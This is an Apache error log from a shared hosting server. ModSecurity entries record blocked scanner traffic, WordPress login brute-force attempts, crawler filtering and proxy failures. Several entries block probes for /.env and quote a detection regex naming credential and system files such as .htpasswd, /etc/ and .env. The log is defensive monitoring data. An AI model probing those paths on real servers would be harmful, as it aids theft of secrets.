[Tue May 26 19:37:47.838498 2026] [security2:error] [pid 70836:tid 70939] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/p.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxwAAA5WY"]
[Tue May 26 19:37:47.913365 2026] [security2:error] [pid 70836:tid 70894] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/php.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxwQAApDk"]
[Tue May 26 19:37:49.115396 2026] [security2:error] [pid 70836:tid 71058] [client 49.13.164.148:49648] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWpNe_FvbQ_BhqVMRVx5AAAAOE"], referer: https://thegoodsporting.com
[Tue May 26 19:37:50.133271 2026] [security2:error] [pid 70836:tid 71000] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpNe_FvbQ_BhqVMRVx9wAAAKc"]
[Tue May 26 19:37:50.438654 2026] [security2:error] [pid 70836:tid 70917] [remote 172.104.164.56:54992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpNu_FvbQ_BhqVMRVyBAAA5FA"]
[Tue May 26 19:37:50.513712 2026] [security2:error] [pid 70836:tid 70918] [remote 216.73.216.30:12766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpNu_FvbQ_BhqVMRVyCwAA_VE"]
[Tue May 26 19:37:51.865074 2026] [security2:error] [pid 70836:tid 70935] [remote 178.156.182.155:57042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpN-_FvbQ_BhqVMRVyMgAA0GI"]
[Tue May 26 19:37:52.722234 2026] [security2:error] [pid 70836:tid 71088] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpOO_FvbQ_BhqVMRVySgAAAP8"]
[Tue May 26 19:37:53.747395 2026] [security2:error] [pid 70836:tid 70944] [remote 101.100.249.238:41526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpOe_FvbQ_BhqVMRVydAAAqms"]
[Tue May 26 19:37:53.940997 2026] [security2:error] [pid 70836:tid 71075] [client 31.57.184.107:56667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.clubcaterpillarmotor.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWpOe_FvbQ_BhqVMRVydgAAAPI"]
[Tue May 26 19:37:54.116212 2026] [security2:error] [pid 70836:tid 71060] [client 194.114.136.103:50603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.136.114.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWpOe_FvbQ_BhqVMRVyfwAAAOM"]
[Tue May 26 19:37:54.419649 2026] [security2:error] [pid 70836:tid 70975] [client 185.191.171.9:30650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWpOu_FvbQ_BhqVMRVykgAAAI4"]
[Tue May 26 19:37:54.419770 2026] [security2:error] [pid 70836:tid 70975] [client 185.191.171.9:30650] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWpOu_FvbQ_BhqVMRVykgAAAI4"]
[Tue May 26 19:37:54.866369 2026] [security2:error] [pid 70836:tid 70989] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpOu_FvbQ_BhqVMRVykwAAAJw"]
[Tue May 26 19:37:56.341115 2026] [security2:error] [pid 70836:tid 71022] [client 113.173.74.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpO-_FvbQ_BhqVMRVyxAAAAL0"]
[Tue May 26 19:37:57.161817 2026] [security2:error] [pid 70836:tid 71045] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpPO_FvbQ_BhqVMRVy4gAAANQ"]
[Tue May 26 19:37:57.745107 2026] [security2:error] [pid 70836:tid 70979] [client 216.163.199.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpPe_FvbQ_BhqVMRVzAAAAAJI"], referer: https://www.anujtradingco.com/
[Tue May 26 19:37:58.839041 2026] [security2:error] [pid 70836:tid 71034] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpPu_FvbQ_BhqVMRVzFwAAAMk"]
[Tue May 26 19:37:59.230818 2026] [security2:error] [pid 70836:tid 71089] [client 216.163.199.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpP-_FvbQ_BhqVMRVzNAAAAQA"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1239681&moderation-hash=56ffcf4ca23706c5a7783305a251802f
[Tue May 26 19:38:00.515533 2026] [security2:error] [pid 70836:tid 70852] [remote 216.73.216.30:31720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpQO_FvbQ_BhqVMRVzUgAAsA8"]
[Tue May 26 19:38:02.276661 2026] [security2:error] [pid 70836:tid 71081] [client 66.249.64.39:51700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpQe_FvbQ_BhqVMRVzaAAAAPg"], referer: https://mosykay.com/prizes/28333076
[Tue May 26 19:38:02.959335 2026] [security2:error] [pid 70836:tid 70997] [client 216.163.199.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpQu_FvbQ_BhqVMRVzlgAAAKQ"], referer: https://anujtradingco.com
[Tue May 26 19:38:03.071558 2026] [security2:error] [pid 70836:tid 71000] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpQu_FvbQ_BhqVMRVzmQAAAKc"]
[Tue May 26 19:38:03.071596 2026] [security2:error] [pid 70836:tid 71000] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpQu_FvbQ_BhqVMRVzmQAAAKc"]
[Tue May 26 19:38:03.071896 2026] [security2:error] [pid 70836:tid 70975] [client 65.109.156.37:56008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWpQu_FvbQ_BhqVMRVzlwAAAI4"]
[Tue May 26 19:38:03.713007 2026] [security2:error] [pid 70836:tid 71048] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpQ-_FvbQ_BhqVMRVzpQAAANc"]
[Tue May 26 19:38:03.905596 2026] [security2:error] [pid 70836:tid 70885] [remote 103.216.118.192:36340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWpQ-_FvbQ_BhqVMRVzqgAA9TA"]
[Tue May 26 19:38:04.347323 2026] [security2:error] [pid 70836:tid 71054] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpQ-_FvbQ_BhqVMRVzswAAAN0"]
[Tue May 26 19:38:04.441196 2026] [security2:error] [pid 70836:tid 71089] [client 66.249.64.36:53433] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpQ-_FvbQ_BhqVMRVzqQAAAQA"], referer: https://mosykay.com/prizes/28333076
[Tue May 26 19:38:05.781948 2026] [security2:error] [pid 70836:tid 70859] [remote 216.73.216.30:41640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpRe_FvbQ_BhqVMRVz7gAA-RY"]
[Tue May 26 19:38:08.082648 2026] [security2:error] [pid 70836:tid 71054] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpR-_FvbQ_BhqVMRV0LgAAAN0"]
[Tue May 26 19:38:08.225577 2026] [security2:error] [pid 70836:tid 70870] [remote 20.153.140.50:48726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWpSO_FvbQ_BhqVMRV0QAAAyyE"]
[Tue May 26 19:38:08.369717 2026] [security2:error] [pid 70836:tid 70867] [remote 103.216.118.192:36340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWpSO_FvbQ_BhqVMRV0SQAA_R4"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:38:08.882815 2026] [security2:error] [pid 70836:tid 71059] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpSO_FvbQ_BhqVMRV0TAAAAOI"]
[Tue May 26 19:38:09.228193 2026] [security2:error] [pid 70836:tid 71089] [client 79.177.133.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWpSe_FvbQ_BhqVMRV0ZwAAAQA"]
[Tue May 26 19:38:11.284840 2026] [security2:error] [pid 70836:tid 71074] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpSu_FvbQ_BhqVMRV0qAAAAPE"]
[Tue May 26 19:38:11.531382 2026] [security2:error] [pid 70836:tid 71042] [client 176.65.139.236:24370] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/.env"] [unique_id "ahWpS-_FvbQ_BhqVMRV0vAAAANE"]
[Tue May 26 19:38:12.009369 2026] [security2:error] [pid 70836:tid 71061] [client 176.65.139.235:58102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "carpetagrafica.jhonweb.com"] [uri "/.env"] [unique_id "ahWpTO_FvbQ_BhqVMRV0zgAAAOQ"]
[Tue May 26 19:38:12.462476 2026] [proxy:error] [pid 70836:tid 71062] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:38:12.462520 2026] [proxy_http:error] [pid 70836:tid 71062] [client 198.235.24.198:59046] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:38:12.463110 2026] [proxy:error] [pid 70836:tid 71062] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:38:12.463140 2026] [proxy_http:error] [pid 70836:tid 71062] [client 198.235.24.198:59046] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:38:13.607841 2026] [security2:error] [pid 70836:tid 71042] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpTe_FvbQ_BhqVMRV08wAAANE"]
[Tue May 26 19:38:13.797036 2026] [security2:error] [pid 70836:tid 70959] [remote 46.62.185.67:59546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWpTe_FvbQ_BhqVMRV1AwAAmno"]
[Tue May 26 19:38:15.552755 2026] [security2:error] [pid 70836:tid 70930] [remote 20.153.140.50:48726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWpT-_FvbQ_BhqVMRV1UgABAV0"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 19:38:15.935804 2026] [security2:error] [pid 70836:tid 70999] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpT-_FvbQ_BhqVMRV1VwAAAKY"]
[Tue May 26 19:38:18.473774 2026] [security2:error] [pid 70836:tid 71054] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpUu_FvbQ_BhqVMRV1mwAAAN0"]
[Tue May 26 19:38:18.555533 2026] [security2:error] [pid 70836:tid 70982] [client 74.7.230.49:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.ellastylze.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWpUe_FvbQ_BhqVMRV1iAAAAJU"]
[Tue May 26 19:38:18.558112 2026] [security2:error] [pid 70836:tid 71051] [client 74.7.230.49:57426] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.ellastylze.com.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWpUe_FvbQ_BhqVMRV1hgAA2jk"]
[Tue May 26 19:38:20.640218 2026] [security2:error] [pid 70836:tid 70923] [remote 222.165.190.235:44206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpVO_FvbQ_BhqVMRV17AAAqVY"]
[Tue May 26 19:38:20.784787 2026] [security2:error] [pid 70836:tid 71051] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpVO_FvbQ_BhqVMRV15wAAANo"]
[Tue May 26 19:38:22.122086 2026] [security2:error] [pid 70836:tid 71004] [client 201.165.144.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpVe_FvbQ_BhqVMRV2DwAAAKs"]
[Tue May 26 19:38:22.704158 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpVu_FvbQ_BhqVMRV2JAAAAJ0"]
[Tue May 26 19:38:23.329793 2026] [security2:error] [pid 70836:tid 70995] [client 114.119.156.59:24349] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-officers-past-regionofindia.htm"] [unique_id "ahWpV-_FvbQ_BhqVMRV2RQAAAKI"], referer: http://dgssi.in/dgssi-officers-past-regionofindia.htm
[Tue May 26 19:38:24.258605 2026] [security2:error] [pid 70836:tid 71011] [client 114.119.134.192:34357] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/works/portfolio-boxed-masonry"] [unique_id "ahWpWO_FvbQ_BhqVMRV2YwAAALI"], referer: http://huso.sskru.ac.th/main2014/what-is-the-national-bird-of-mauritius
[Tue May 26 19:38:24.806288 2026] [security2:error] [pid 70836:tid 71045] [client 85.132.252.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpWO_FvbQ_BhqVMRV2gwAAANQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:38:25.530492 2026] [security2:error] [pid 70836:tid 70841] [remote 216.73.216.30:41640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpWe_FvbQ_BhqVMRV2oAAA8AQ"]
[Tue May 26 19:38:25.639061 2026] [security2:error] [pid 70836:tid 71046] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpWe_FvbQ_BhqVMRV2kgAAANU"]
[Tue May 26 19:38:26.191651 2026] [security2:error] [pid 70836:tid 70840] [remote 213.171.208.232:56430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpWe_FvbQ_BhqVMRV2qgAA6gM"]
[Tue May 26 19:38:27.524800 2026] [security2:error] [pid 70836:tid 70947] [remote 213.171.208.232:56430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpW-_FvbQ_BhqVMRV21QAAi24"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:38:28.045290 2026] [security2:error] [pid 70836:tid 71057] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpW-_FvbQ_BhqVMRV23wAAAOA"]
[Tue May 26 19:38:28.273508 2026] [security2:error] [pid 70836:tid 71035] [client 85.132.252.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpXO_FvbQ_BhqVMRV29QAAAMo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430894&moderation-hash=9f44ea2a5de14588c637934728742756
[Tue May 26 19:38:30.341481 2026] [security2:error] [pid 70836:tid 71011] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpXe_FvbQ_BhqVMRV3KgAAALI"]
